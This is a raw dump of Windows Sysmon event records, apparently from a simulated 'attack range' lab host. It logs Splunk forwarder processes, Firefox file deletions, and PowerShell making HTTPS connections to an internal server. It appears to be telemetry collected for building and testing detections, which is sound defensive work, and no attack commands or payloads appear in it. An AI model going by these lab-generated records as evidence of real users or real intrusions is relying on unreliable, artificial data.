23542300x800000000000000035085585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1483593A7373814A26727C41B71045F6,SHA256=050B81DC7C4BBF90F584871E3BFA609B9FB162C5520189172A23543D85FE9470,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.103{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56746-false10.0.1.12-8000- 23542300x800000000000000035085589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:22.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA65CF9220B55E70F89DFCCAE608D720,SHA256=556746D6EC7FEB75836F774886F0DB3F6B2BB70F8D927864B64FE18EF661F119,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:23.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF2B84FCCC5F5FD6F9FE513E7C383E1,SHA256=BC01D56347C338CE21415A68E321CECF332E9B82782E90A136A87CF60DF65EBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:46.904{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56747-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:24.838{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A28BCE095EF08265E68931B11601FEB,SHA256=A8E6A0B42C5D385FB719872B0B3EC9079024CCACF7AEED6B917041CB8A982B4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:25.852{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D58180781C1B6B485C76AD17D4190CF3,SHA256=9061F2A363101D2A83C5C9DB39B46421BC543915D24FA36E48702B57DA9AC9D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:26.866{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FF2221DBA386A8ED5EF2839D2C4EDCF,SHA256=2DD95B1FC6C28416B6B291C59BFD91B5DE748E0DBEC4CD69744267587093C142,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:50.263{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56748-false10.0.1.12-8000- 23542300x800000000000000035085596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:27.883{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1CB0692A480DA354BCA6D18AC576590,SHA256=9ED3CE0DAC83893A6A620D3CB9F14B36BD7B5DCC93B00797AF942D9B79BC126A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.950{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90DB0E13194E39336669E6F30355EA29,SHA256=134AEAE09EDBB6A5CB8148FC8E03CF036EB4E48B6B342EBB57361565305FE673,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=43DD4E71A5D0D6B1FFB3F1AFDB434B56,SHA256=5C69A7134525B739F8A5900282100404474A188D2DED0C9294D86936D11977CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=14F582F0B647D6BCE943DDE6E75F32BF,SHA256=B5335FA34384E87863CBD86878936B554723089589B9743E5C69A830C0AC1AF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=0B7BDE63C5B552F73FDB0849B5C1E07A,SHA256=5F84F0CE3C49DEFF4774B6D5B87FF8159D12B008ED8084BCA18E0EE8B020F40E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=B1A8E837F6C8CE32FE4F07622A06A359,SHA256=7FD66CDBCD2AD4437B024C91166F1C5F287A66ABA5FC0FCDF6910DDFA83B17A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=B299895FC65CB2CF459C173DE0093F88,SHA256=599075CCBF553D41308ADF36F6EECCAA1F33D84562AB30101B8B177A3D88A794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=01A9423BE0D1EA1B6A7C2B2BC8C122AB,SHA256=F85A6D1041F9CA2EDE51E75EF7980D33A65FAF7A978436C6EFCB862EB25F6E98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:52.929{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56749-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035085606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.450{B81B27B7-4F7C-613A-6B90-03000000C801}66086664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.285{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.282{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.266{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AE54460B2F3D0F709850EDCB17C8DF49,SHA256=24D4E9B05DAB3FA147AA1C0A7768607BF836D4BCBDC3040665FDB75D12853A36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:29.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB6A73220D41133C86CD790131565EF1,SHA256=A8FB6C535103DD3938FC51582E76CA9CA9E36AB1D39D0BAEC63B411337BA1917,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2ABB86CA1A86A19ADC1737C91087030,SHA256=6FE5B2C998DB091F8F490836B3408EA84083D47EC509FF6921226CBA8DD7440E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 